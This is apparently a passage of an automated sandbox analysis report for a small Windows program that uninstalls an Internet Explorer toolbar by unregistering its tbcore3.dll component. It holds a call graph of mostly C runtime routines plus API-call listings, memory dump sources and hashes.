__decode_pointer 6 API calls 3459->3460 3461 982c1a __invoke_watson 3460->3461 3463 982ac8 EnterCriticalSection 3462->3463 3464 982ab5 3462->3464 3463->3455 3523 9829dd 3464->3523 3466 982abb 3466->3463 3467 981411 __amsg_exit 65 API calls 3466->3467 3468 982ac7 3467->3468 3468->3463 3472 984df1 3469->3472 3470 984e8a 3474 984e93 3470->3474 3722 9849da 3470->3722 3472->3470 3472->3474 3715 98492a 3472->3715 3474->3455 3726 9829c6 LeaveCriticalSection 3475->3726 3477 985682 3477->3455 3479 9820f9 __decode_pointer 6 API calls 3478->3479 3480 9831fb 3479->3480 3480->3455 3495 982174 TlsGetValue 3481->3495 3484 982339 SetLastError 3484->3458 3485 983730 __calloc_crt 63 API calls 3486 9822f7 3485->3486 3486->3484 3487 9820f9 __decode_pointer 6 API calls 3486->3487 3488 982311 3487->3488 3489 982318 3488->3489 3490 982330 3488->3490 3491 9821e5 __getptd_noexit 63 API calls 3489->3491 3500 9835ee 3490->3500 3493 982320 GetCurrentThreadId 3491->3493 3493->3484 3494 982336 3494->3484 3496 982189 3495->3496 3497 9821a4 3495->3497 3498 9820f9 __decode_pointer 6 API calls 3496->3498 3497->3484 3497->3485 3499 982194 TlsSetValue 3498->3499 3499->3497 3501 9835fa __ioinit 3500->3501 3503 982aa0 __lock 64 API calls 3501->3503 3509 983673 _realloc __ioinit 3501->3509 3512 983639 3501->3512 3502 98364e HeapFree 3504 983660 3502->3504 3502->3509 3508 983611 ___sbh_find_block 3503->3508 3505 982c72 strtoxl 64 API calls 3504->3505 3506 983665 GetLastError 3505->3506 3506->3509 3507 98362b 3519 983644 3507->3519 3508->3507 3513 984614 3508->3513 3509->3494 3512->3502 3512->3509 3514 984653 3513->3514 3518 9848f5 ___sbh_free_block 3513->3518 3515 98483f VirtualFree 3514->3515 3514->3518 3516 9848a3 3515->3516 3517 9848b2 VirtualFree HeapFree 3516->3517 3516->3518 3517->3518 3518->3507 3522 9829c6 LeaveCriticalSection 3519->3522 3521 98364b 3521->3512 3522->3521 3524 9829e9 __ioinit 3523->3524 3538 982a0f 3524->3538 3549 9818c4 3524->3549 3529 982a1f __ioinit 3529->3466 3531 982a40 3535 982aa0 __lock 66 API calls 3531->3535 3532 982a31 3534 982c72 strtoxl 66 API calls 3532->3534 3534->3529 3537 982a47 3535->3537 3539 982a7b 3537->3539 3540 982a4f 3537->3540 3538->3529 3595 9836eb 3538->3595 3541 9835ee __getptd_noexit 66 API calls 3539->3541 3542 98317c __ioinit InitializeCriticalSectionAndSpinCount 3540->3542 3543 982a6c 3541->3543 3544 982a5a 3542->3544 3600 982a97 3543->3600 3544->3543 3546 9835ee __getptd_noexit 66 API calls 3544->3546 3547 982a66 3546->3547 3548 982c72 strtoxl 66 API calls 3547->3548 3548->3543 3603 9835a3 3549->3603 3552 9818d8 3554 981719 __NMSG_WRITE 66 API calls 3552->3554 3556 9818fa 3552->3556 3553 9835a3 __set_error_mode 66 API calls 3553->3552 3555 9818f0 3554->3555 3557 981719 __NMSG_WRITE 66 API calls 3555->3557 3558 981719 3556->3558 3557->3556 3559 98172d 3558->3559 3560 9835a3 __set_error_mode 63 API calls 3559->3560 3591 981888 3559->3591 3561 98174f 3560->3561 3562 98188d GetStdHandle 3561->3562 3564 9835a3 __set_error_mode 63 API calls 3561->3564 3563 98189b _strlen 3562->3563 3562->3591 3567 9818b4 WriteFile 3563->3567 3563->3591 3565 981760 3564->3565 3565->3562 3566 981772 3565->3566 3566->3591 3609 98353b 3566->3609 3567->3591 3570 9817a8 GetModuleFileNameA 3572 9817c6 3570->3572 3576 9817e9 _strlen 3570->3576 3574 98353b _strcpy_s 63 API calls 3572->3574 3575 9817d6 3574->3575 3575->3576 3577 982ae2 __invoke_watson 10 API calls 3575->3577 3588 98182c 3576->3588 3625 9833f0 3576->3625 3577->3576 3581 98337c _strcat_s 63 API calls 3584 981864 3581->3584 3583 982ae2 __invoke_watson 10 API calls 3586 981850 3583->3586 3587 981875 3584->3587 3589 982ae2 __invoke_watson 10 API calls 3584->3589 3585 982ae2 __invoke_watson 10 API calls 3585->3588 3586->3581 3643 983213 3587->3643 3634 98337c 3588->3634 3589->3587 3592 981465 3591->3592 3681 98143a GetModuleHandleW 3592->3681 3598 9836f4 3595->3598 3597 982a2a 3597->3531 3597->3532 3598->3597 3599 98370b Sleep 3598->3599 3685 9854b5 3598->3685 3599->3598 3714 9829c6 LeaveCriticalSection 3600->3714 3602 982a9e 3602->3529 3604 9835b2 3603->3604 3605 982c72 strtoxl 66 API calls 3604->3605 3608 9818cb 3604->3608 3606 9835d5 3605->3606 3607 982c0a strtoxl 6 API calls 3606->3607 3607->3608 3608->3552 3608->3553 3610 983553 3609->3610 3611 98354c 3609->3611 3612 982c72 strtoxl 66 API calls 3610->3612 3611->3610 3616 983579 3611->3616 3613 983558 3612->3613 3614 982c0a strtoxl 6 API calls 3613->3614 3615 981794 3614->3615 3615->3570 3618 982ae2 3615->3618 3616->3615 3617 982c72 strtoxl 66 API calls 3616->3617 3617->3613 3670 985320 3618->3670 3620 982b0f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3621 982beb GetCurrentProcess TerminateProcess 3620->3621 3622 982bdf __invoke_watson 3620->3622 3672 9810cc 3621->3672 3622->3621 3624 9817a5 3624->3570 3629 983402 3625->3629 3626 983406 3627 981819 3626->3627 3628 982c72 strtoxl 66 API calls 3626->3628 3627->3585 3627->3588 3630 983422 3628->3630 3629->3626 3629->3627 3632 98344c 3629->3632 3631 982c0a strtoxl 6 API calls 3630->3631 3631->3627 3632->3627 3633 982c72 strtoxl 66 API calls 3632->3633 3633->3630 3635 98338d 3634->3635 3636 983394 3634->3636 3635->3636 3640 9833c8 3635->3640 3637 982c72 strtoxl 66 API calls 3636->3637 3638 983399 3637->3638 3639 982c0a strtoxl 6 API calls 3638->3639 3641 98183f 3639->3641 3640->3641 3642 982c72 strtoxl 66 API calls 3640->3642 3641->3583 3641->3586 3642->3638 3644 9820f0 _doexit 6 API calls 3643->3644 3645 983223 3644->3645 3646 983236 LoadLibraryA 3645->3646 3669 9832be 3645->3669 3647 98324b GetProcAddress 3646->3647 3649 983360 3646->3649 3648 983261 3647->3648 3647->3649 3651 98207e __encode_pointer 6 API calls 3648->3651 3649->3591 3650 983313 3652 9820f9 __decode_pointer 6 API calls 3650->3652 3656 983267 GetProcAddress 3651->3656 3652->3649 3653 9820f9 __decode_pointer 6 API calls 3663 98332b 3653->3663 3654 9820f9 __decode_pointer 6 API calls 3655 9832db 3654->3655 3657 9820f9 __decode_pointer 6 API calls 3655->3657 3658 98207e __encode_pointer 6 API calls 3656->3658 3661 9832e8 3657->3661 3659 98327c GetProcAddress 3658->3659 3660 98207e __encode_pointer 6 API calls 3659->3660 3662 983291 GetProcAddress 3660->3662 3661->3650 3661->3653 3664 98207e __encode_pointer 6 API calls 3662->3664 3663->3650 3665 9820f9 __decode_pointer 6 API calls 3663->3665 3666 9832a6 3664->3666 3665->3650 3667 9832b0 GetProcAddress 3666->3667 3666->3669 3668 98207e __encode_pointer 6 API calls 3667->3668 3668->3669 3669->3654 3669->3661 3671 98532c __VEC_memzero 3670->3671 3671->3620 3671->3671 3673 9810d4 3672->3673 3674 9810d6 IsDebuggerPresent 3672->3674 3673->3624 3680 9828d2 3674->3680 3677 981358 SetUnhandledExceptionFilter UnhandledExceptionFilter 3678 98137d GetCurrentProcess TerminateProcess 3677->3678 3679 981375 __invoke_watson 3677->3679 3678->3624 3679->3678 3680->3677 3682 98144e GetProcAddress 3681->3682 3683 981463 ExitProcess 3681->3683 3682->3683 3684 98145e 3682->3684 3684->3683 3686 985568 3685->3686 3691 9854c7 3685->3691 3687 9831eb _malloc 6 API calls 3686->3687 3688 98556e 3687->3688 3690 982c72 strtoxl 65 API calls 3688->3690 3689 9818c4 __FF_MSGBANNER 65 API calls 3689->3691 3696 985560 3690->3696 3691->3689 3693 981719 __NMSG_WRITE 65 API calls 3691->3693 3694 985524 HeapAlloc 3691->3694 3695 981465 _doexit 3 API calls 3691->3695 3691->3696 3697 985554 3691->3697 3699 9831eb _malloc 6 API calls 3691->3699 3700 985559 3691->3700 3702 985466 3691->3702 3693->3691 3694->3691 3695->3691 3696->3598 3698 982c72 strtoxl 65 API calls 3697->3698 3698->3700 3699->3691 3701 982c72 strtoxl 65 API calls 3700->3701 3701->3696 3703 985472 __ioinit 3702->3703 3704 9854a3 __ioinit 3703->3704 3705 982aa0 __lock 66 API calls 3703->3705 3704->3691 3706 985488 3705->3706 3707 984dc3 ___sbh_alloc_block 5 API calls 3706->3707 3708 985493 3707->3708 3710 9854ac 3708->3710 3713 9829c6 LeaveCriticalSection 3710->3713 3712 9854b3 3712->3704 3713->3712 3714->3602 3716 98493d HeapReAlloc 3715->3716 3717 984971 HeapAlloc 3715->3717 3718 98495f 3716->3718 3720 98495b 3716->3720 3719 984994 VirtualAlloc 3717->3719 3717->3720 3718->3717 3719->3720 3721 9849ae HeapFree 3719->3721 3720->3470 3721->3720 3723 9849f1 VirtualAlloc 3722->3723 3725 984a38 3723->3725 3725->3474 3726->3477 3727->3405 3746 9829c6 LeaveCriticalSection 3728->3746 3730 98227c 3730->3415 3732 983cbc InterlockedIncrement 3731->3732 3733 983cbf 3731->3733 3732->3733 3734 983cc9 InterlockedIncrement 3733->3734 3735 983ccc 3733->3735 3734->3735 3736 983cd9 3735->3736 3737 983cd6 InterlockedIncrement 3735->3737 3738 983ce3 InterlockedIncrement 3736->3738 3740 983ce6 3736->3740 3737->3736 3738->3740 3739 983cff InterlockedIncrement 3739->3740 3740->3739 3741 983d0f InterlockedIncrement 3740->3741 3742 983d1a InterlockedIncrement 3740->3742 3741->3740 3742->3418 3747 9829c6 LeaveCriticalSection 3743->3747 3745 9822ca 3745->3420 3746->3730 3747->3745 3748->3280 3750 983808 3749->3750 3751 981dd3 3750->3751 3752 98382f __VEC_memcpy 3750->3752 3751->3299 3752->3751 3754 98368d 3753->3754 3755 983694 3753->3755 3754->3755 3759 9836c0 3754->3759 3756 982c72 strtoxl 66 API calls 3755->3756 3757 983699 3756->3757 3758 982c0a strtoxl 6 API calls 3757->3758 3760 9836a8 3758->3760 3759->3760 3761 982c72 strtoxl 66 API calls 3759->3761 3760->3312 3761->3757 3763 982dc9 3762->3763 3764 98207e __encode_pointer 6 API calls 3763->3764 3765 982de1 3763->3765 3764->3763 3765->3324 3769 982d70 3766->3769 3768 982db9 3768->3326 3770 982d7c __ioinit 3769->3770 3777 98147d 3770->3777 3776 982d9d __ioinit 3776->3768 3778 982aa0 __lock 66 API calls 3777->3778 3779 981484 3778->3779 3780 982c85 3779->3780 3781 9820f9 __decode_pointer 6 API calls 3780->3781 3782 982c99 3781->3782 3783 9820f9 __decode_pointer 6 API calls 3782->3783 3784 982ca9 3783->3784 3785 982d2c 3784->3785 3800 98539a 3784->3800 3797 982da6 3785->3797 3787 98207e __encode_pointer 6 API calls 3788 982d21 3787->3788 3791 98207e __encode_pointer 6 API calls 3788->3791 3789 982ceb 3789->3785 3793 98377c __realloc_crt 73 API calls 3789->3793 3794 982d01 3789->3794 3790 982cc7 3790->3789 3796 982d13 3790->3796 3813 98377c 3790->3813 3791->3785 3793->3794 3794->3785 3795 98207e __encode_pointer 6 API calls 3794->3795 3795->3796 3796->3787 3863 981486 3797->3863 3801 9853a6 __ioinit 3800->3801 3802 9853d3 3801->3802 3803 9853b6 3801->3803 3804 985414 HeapSize 3802->3804 3806 982aa0 __lock 66 API calls 3802->3806 3805 982c72 strtoxl 66 API calls 3803->3805 3809 9853cb __ioinit 3804->3809 3807 9853bb 3805->3807 3810 9853e3 ___sbh_find_block 3806->3810 3808 982c0a strtoxl 6 API calls 3807->3808 3808->3809 3809->3790 3818 985434 3810->3818 3817 983785 3813->3817 3815 9837c4 3815->3789 3816 9837a5 Sleep 3816->3817 3817->3815 3817->3816 3822 98569d 3817->3822 3821 9829c6 LeaveCriticalSection 3818->3821 3820 98540f 3820->3804 3820->3809 3821->3820 3823 9856a9 __ioinit 3822->3823 3824 9856be 3823->3824 3825 9856b0 3823->3825 3827 9856d1 3824->3827 3828 9856c5 3824->3828 3826 9854b5 _malloc 66 API calls 3825->3826 3844 9856b8 _realloc __ioinit 3826->3844 3834 985843 3827->3834 3858 9856de ___sbh_resize_block ___sbh_find_block 3827->3858 3829 9835ee __getptd_noexit 66 API calls 3828->3829 3829->3844 3830 985876 3833 9831eb _malloc 6 API calls 3830->3833 3831 985848 HeapReAlloc 3831->3834 3831->3844 3832 982aa0 __lock 66 API calls 3832->3858 3835 98587c 3833->3835 3834->3830 3834->3831 3836 98589a 3834->3836 3838 9831eb _malloc 6 API calls 3834->3838 3841 985890 3834->3841 3837 982c72 strtoxl 66 API calls 3835->3837 3839 982c72 strtoxl 66 API calls 3836->3839 3836->3844 3837->3844 3838->3834 3840 9858a3 GetLastError 3839->3840 3840->3844 3843 982c72 strtoxl 66 API calls 3841->3843 3846 985811 3843->3846 3844->3817 3845 985769 HeapAlloc 3845->3858 3846->3844 3848 985816 GetLastError 3846->3848 3847 9857be HeapReAlloc 3847->3858 3848->3844 3849 984dc3 ___sbh_alloc_block 5 API calls 3849->3858 3850 985829 3850->3844 3852 982c72 strtoxl 66 API calls 3850->3852 3851 9831eb _malloc 6 API calls 3851->3858 3854 985836 3852->3854 3853 984614 VirtualFree VirtualFree HeapFree ___sbh_free_block 3853->3858 3854->3840 3854->3844 3855 98580c 3857 982c72 strtoxl 66 API calls 3855->3857 3856 9837f0 __VEC_memcpy _realloc 3856->3858 3857->3846 3858->3830 3858->3832 3858->3844 3858->3845 3858->3847 3858->3849 3858->3850 3858->3851 3858->3853 3858->3855 3858->3856 3859 9857e1 3858->3859 3862 9829c6 LeaveCriticalSection 3859->3862 3861 9857e8 3861->3858 3862->3861 3866 9829c6 LeaveCriticalSection 3863->3866 3865 98148d 3865->3776 3866->3865 3868 981561 __ioinit 3867->3868 3869 982aa0 __lock 66 API calls 3868->3869 3870 981568 3869->3870 3871 981631 __initterm 3870->3871 3872 981594 3870->3872 3886 98166c 3871->3886 3874 9820f9 __decode_pointer 6 API calls 3872->3874 3876 98159f 3874->3876 3878 981621 __initterm 3876->3878 3880 9820f9 __decode_pointer 6 API calls 3876->3880 3877 981669 __ioinit 3877->3343 3878->3871 3885 9815b4 3880->3885 3881 981660 3882 981465 _doexit 3 API calls 3881->3882 3882->3877 3883 9820f9 6 API calls __decode_pointer 3883->3885 3884 9820f0 6 API calls _doexit 3884->3885 3885->3878 3885->3883 3885->3884 3887 98164d 3886->3887 3888 981672 3886->3888 3887->3877 3890 9829c6 LeaveCriticalSection 3887->3890 3891 9829c6 LeaveCriticalSection 3888->3891 3890->3881 3891->3887 4210 984247 4220 9841cb 4210->4220 4213 984272 setSBCS 4214 9810cc ___convertcp 5 API calls 4213->4214 4215 98442a 4214->4215 4216 9842b6 IsValidCodePage 4216->4213 4217 9842c8 GetCPInfo 4216->4217 4217->4213 4219 9842db ___convertcp __setmbcp_nolock 4217->4219 4227 983f0d GetCPInfo 4219->4227 4237 984144 4220->4237 4223 984208 4225 98420d GetACP 4223->4225 4226 9841fa 4223->4226 4224 9841ea GetOEMCP 4224->4226 4225->4226 4226->4213 4226->4216 4226->4219 4230 983f41 ___convertcp 4227->4230 4236 983ff3 4227->4236 4292 985fe2 4230->4292 4232 9810cc ___convertcp 5 API calls 4234 98409e 4232->4234 4234->4219 4235 986415 ___crtLCMapStringA 101 API calls 4235->4236 4236->4232 4238 984157 4237->4238 4244 9841a4 4237->4244 4239 982345 __getptd 66 API calls 4238->4239 4240 98415c 4239->4240 4241 984184 4240->4241 4245 983e04 4240->4245 4241->4244 4260 9840a0 4241->4260 4244->4223 4244->4224 4246 983e10 __ioinit 4245->4246 4247 982345 __getptd 66 API calls 4246->4247 4248 983e15 4247->4248 4249 983e43 4248->4249 4251 983e27 4248->4251 4250 982aa0 __lock 66 API calls 4249->4250 4252 983e4a 4250->4252 4253 982345 __getptd 66 API calls 4251->4253 4276 983dc6 4252->4276 4255 983e2c 4253->4255 4258 983e3a __ioinit 4255->4258 4259 981411 __amsg_exit 66 API calls 4255->4259 4258->4241 4259->4258 4261 9840ac __ioinit 4260->4261 4262 982345 __getptd 66 API calls 4261->4262 4263 9840b1 4262->4263 4264 982aa0 __lock 66 API calls 4263->4264 4265 9840c3 4263->4265 4266 9840e1 4264->4266 4268 9840d1 __ioinit 4265->4268 4270 981411 __amsg_exit 66 API calls 4265->4270 4267 98412a 4266->4267 4271 9840f8 InterlockedDecrement 4266->4271 4272 984112 InterlockedIncrement 4266->4272 4288 98413b 4267->4288 4268->4244 4270->4268 4271->4272 4273 984103 4271->4273 4272->4267 4273->4272 4274 9835ee __getptd_noexit 66 API calls 4273->4274 4275 984111 4274->4275 4275->4272 4277 983dca 4276->4277 4278 983dfc 4276->4278 4277->4278 4279 983c9e ___addlocaleref 8 API calls 4277->4279 4284 983e6e 4278->4284 4280 983ddd 4279->4280 4280->4278 4281 983d2d ___removelocaleref 8 API calls 4280->4281 4282 983de8 4281->4282 4282->4278 4283 983b55 ___freetlocinfo 66 API calls 4282->4283 4283->4278 4287 9829c6 LeaveCriticalSection 4284->4287 4286 983e75 4286->4255 4287->4286 4291 9829c6 LeaveCriticalSection 4288->4291 4290 984142 4290->4265 4291->4290 4293 984144 _LocaleUpdate::_LocaleUpdate 76 API calls 4292->4293 4294 985ff5 4293->4294 4302 985e28 4294->4302 4297 986415 4298 984144 _LocaleUpdate::_LocaleUpdate 76 API calls 4297->4298 4299 986428 4298->4299 4390 986070 4299->4390 4303 985e49 GetStringTypeW 4302->4303 4304 985e74 4302->4304 4305 985e69 GetLastError 4303->4305 4306 985e61 4303->4306 4304->4306 4307 985f5b 4304->4307 4305->4304 4308 985ead MultiByteToWideChar 4306->4308 4318 985f55 4306->4318 4330 986b1a GetLocaleInfoA 4307->4330 4310 985eda 4308->4310 4308->4318 4315 9854b5 _malloc 66 API calls 4310->4315 4324 985eef ___convertcp __alloca_probe_16 4310->4324 4311 9810cc ___convertcp 5 API calls 4312 983fae 4311->4312 4312->4297 4313 985fac GetStringTypeA 4313->4318 4319 985fc7 4313->4319 4315->4324 4317 985f28 MultiByteToWideChar 4321 985f3e GetStringTypeW 4317->4321 4322 985f4f 4317->4322 4318->4311 4323 9835ee __getptd_noexit 66 API calls 4319->4323 4321->4322 4326 985446 4322->4326 4323->4318 4324->4317 4324->4318 4327 985452 4326->4327 4328 985463 4326->4328 4327->4328 4329 9835ee __getptd_noexit 66 API calls 4327->4329 4328->4318 4329->4328 4331 986b4d 4330->4331 4332 986b48 4330->4332 4361 986b04 4331->4361 4334 9810cc ___convertcp 5 API calls 4332->4334 4335 985f7f 4334->4335 4335->4313 4335->4318 4336 986b63 4335->4336 4337 986c2d 4336->4337 4338 986ba3 GetCPInfo 4336->4338 4341 9810cc ___convertcp 5 API calls 4337->4341 4339 986c18 MultiByteToWideChar 4338->4339 4340 986bba 4338->4340 4339->4337 4345 986bd3 _strlen 4339->4345 4340->4339 4342 986bc0 GetCPInfo 4340->4342 4343 985fa0 4341->4343 4342->4339 4344 986bcd 4342->4344 4343->4313 4343->4318 4344->4339 4344->4345 4346 9854b5 _malloc 66 API calls 4345->4346 4348 986c05 ___convertcp __alloca_probe_16 4345->4348 4346->4348 4347 986c62 MultiByteToWideChar 4349 986c7a 4347->4349 4360 986c99 4347->4360 4348->4337 4348->4347 4351 986c9e 4349->4351 4352 986c81 WideCharToMultiByte 4349->4352 4350 985446 __freea 66 API calls 4350->4337 4353 986ca9 WideCharToMultiByte 4351->4353 4354 986cbd 4351->4354 4352->4360 4353->4354 4353->4360 4355 983730 __calloc_crt 66 API calls 4354->4355 4356 986cc5 4355->4356 4357 986cce WideCharToMultiByte 4356->4357 4356->4360 4358 986ce0 4357->4358 4357->4360 4359 9835ee __getptd_noexit 66 API calls 4358->4359 4359->4360 4360->4350 4364 986f7a 4361->4364 4365 986f93 4364->4365 4368 986d4b 4365->4368 4369 984144 _LocaleUpdate::_LocaleUpdate 76 API calls 4368->4369 4370 986d60 4369->4370 4371 986d72 4370->4371 4376 986daf 4370->4376 4372 982c72 strtoxl 66 API calls 4371->4372 4373 986d77 4372->4373 4374 982c0a strtoxl 6 API calls 4373->4374 4379 986b15 4374->4379 4377 986df4 4376->4377 4380 9869e5 4376->4380 4378 982c72 strtoxl 66 API calls 4377->4378 4377->4379 4378->4379 4379->4332 4381 984144 _LocaleUpdate::_LocaleUpdate 76 API calls 4380->4381 4382 9869f9 4381->4382 4386 986a06 4382->4386 4387 986acc 4382->4387 4385 985fe2 ___crtGetStringTypeA 90 API calls 4385->4386 4386->4376 4388 984144 _LocaleUpdate::_LocaleUpdate 76 API calls 4387->4388 4389 986a2e 4388->4389 4389->4385 4391 986091 LCMapStringW 4390->4391 4394 9860ac 4390->4394 4392 9860b4 GetLastError 4391->4392 4391->4394 4392->4394 4393 9862aa 4396 986b1a ___ansicp 90 API calls 4393->4396 4394->4393 4395 986106 4394->4395 4397 98611f MultiByteToWideChar 4395->4397 4420 9862a1 4395->4420 4398 9862d2 4396->4398 4403 98614c 4397->4403 4397->4420 4401 9862eb 4398->4401 4402 9863c6 LCMapStringA 4398->4402 4398->4420 4399 9810cc ___convertcp 5 API calls 4400 983fce 4399->4400 4400->4235 4404 986b63 ___convertcp 73 API calls 4401->4404 4436 986322 4402->4436 4407 9854b5 _malloc 66 API calls 4403->4407 4414 986165 __alloca_probe_16 4403->4414 4408 9862fd 4404->4408 4405 98619d MultiByteToWideChar 4409 9861b6 LCMapStringW 4405->4409 4431 986298 4405->4431 4406 9863ed 4417 9835ee __getptd_noexit 66 API calls 4406->4417 4406->4420 4407->4414 4411 986307 LCMapStringA 4408->4411 4408->4420 4413 9861d7 4409->4413 4409->4431 4410 9835ee __getptd_noexit 66 API calls 4410->4406 4423 986329 4411->4423 4411->4436 4412 985446 __freea 66 API calls 4412->4420 4415 9861e0 4413->4415 4422 986209 4413->4422 4414->4405 4414->4420 4419 9861f2 LCMapStringW 4415->4419 4415->4431 4416 986224 __alloca_probe_16 4421 986258 LCMapStringW 4416->4421 4416->4431 4417->4420 4418 98633a ___convertcp __alloca_probe_16 4429 986378 LCMapStringA 4418->4429 4418->4436 4419->4431 4420->4399 4424 986292 4421->4424 4427 986270 WideCharToMultiByte 4421->4427 4422->4416 4426 9854b5 _malloc 66 API calls 4422->4426 4423->4418 4425 9854b5 _malloc 66 API calls 4423->4425 4428 985446 __freea 66 API calls 4424->4428 4425->4418 4426->4416 4427->4424 4428->4431 4432 986398 4429->4432 4433 986394 4429->4433 4431->4412 4434 986b63 ___convertcp 73 API calls 4432->4434 4435 985446 __freea 66 API calls 4433->4435 4434->4433 4435->4436 4436->4406 4436->4410

                                                                              Executed Functions

                                                                              Function 00981000 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 73libraryloadersynchronizationCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 00981006
                                                                              • CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 00981013
                                                                              • GetLastError.KERNEL32 ref: 0098101F
                                                                              • GetCommandLineW.KERNEL32(?), ref: 00981040
                                                                              • CommandLineToArgvW.SHELL32(00000000), ref: 00981047
                                                                              • PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 00981061
                                                                              • PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 00981073
                                                                              • LoadLibraryW.KERNELBASE(?), ref: 00981085
                                                                              • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00981097
                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 009810A4
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 009810AB
                                                                              • CoUninitialize.COMBASE ref: 009810B1
                                                                              • LocalFree.KERNEL32(00000000), ref: 009810BC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000028.00000002.2673119260.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000028.00000002.2673036351.0000000000980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673184763.0000000000988000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673237993.000000000098A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673291727.000000000098C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_40_2_980000_NEiV2V.jbxd
                                                                              Similarity
                                                                              • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                                              • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
                                                                              • API String ID: 474438367-4110843154
                                                                              • Opcode ID: a0854c67d12822cddf166e288f6202d3bb855da3c3006d0634b737bfb5407fb6
                                                                              • Instruction ID: 2527ec1c90a979fc76529919d65ee8e7f1f0d216d3a3c3db9e77d3fe8088c3a2
                                                                              • Opcode Fuzzy Hash: a0854c67d12822cddf166e288f6202d3bb855da3c3006d0634b737bfb5407fb6
                                                                              • Instruction Fuzzy Hash: EC11BE3261E365EB8320BF60AC0CAAF379CFB85765754052AF542D2350CF258846EBB2
                                                                              Function 00981465 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 16 981465-981476 call 98143a ExitProcess
                                                                              APIs
                                                                              • ___crtCorExitProcess.LIBCMT ref: 0098146D
                                                                                • Part of subcall function 0098143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,00981472,?,?,009854EE,000000FF,0000001E,?,009836FC,?,00000001,?,?,00982A2A,00000018), ref: 00981444
                                                                                • Part of subcall function 0098143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00981454
                                                                              • ExitProcess.KERNEL32 ref: 00981476
                                                                              Memory Dump Source
                                                                              • Source File: 00000028.00000002.2673119260.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000028.00000002.2673036351.0000000000980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673184763.0000000000988000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673237993.000000000098A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673291727.000000000098C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_40_2_980000_NEiV2V.jbxd
                                                                              Similarity
                                                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                              • String ID:
                                                                              • API String ID: 2427264223-0
                                                                              • Opcode ID: 975b6648ed137ce187da50986a416ac992d8fad11703c4bc7b7bced9b606629e
                                                                              • Instruction ID: d39f1b31fccb9e3bcce5effc4a982ab0bd666f6fbd599fa061e298bd11127753
                                                                              • Opcode Fuzzy Hash: 975b6648ed137ce187da50986a416ac992d8fad11703c4bc7b7bced9b606629e
                                                                              • Instruction Fuzzy Hash: D7B09B31004108FBDB013F11DC09D4D3F19FB803507608014F40845131DF719D529790
                                                                              Function 0098261B Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 19 98261b-98263d HeapCreate 20 98263f-982640 19->20 21 982641-98264a 19->21
                                                                              APIs
                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00982630
                                                                              Memory Dump Source
                                                                              • Source File: 00000028.00000002.2673119260.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000028.00000002.2673036351.0000000000980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673184763.0000000000988000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673237993.000000000098A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673291727.000000000098C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_40_2_980000_NEiV2V.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHeap
                                                                              • String ID:
                                                                              • API String ID: 10892065-0
                                                                              • Opcode ID: 2b377b7014750bec3e4edaf5d296ff4330773b59f5ffbdd700bff2eda154af48
                                                                              • Instruction ID: 86112086aa4e218b8d0f8e020df49345cff122f0e01965d45a159b31a5582a01
                                                                              • Opcode Fuzzy Hash: 2b377b7014750bec3e4edaf5d296ff4330773b59f5ffbdd700bff2eda154af48
                                                                              • Instruction Fuzzy Hash: 8BD0A7325683445FEB105F71BC097623BDCD384395F184436B90CC6361F674C594EB00
                                                                              Function 00981681 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 22 981681-98168d call 981555 24 981692-981696 22->24
                                                                              APIs
                                                                              • _doexit.LIBCMT ref: 0098168D
                                                                                • Part of subcall function 00981555: __lock.LIBCMT ref: 00981563
                                                                                • Part of subcall function 00981555: __decode_pointer.LIBCMT ref: 0098159A
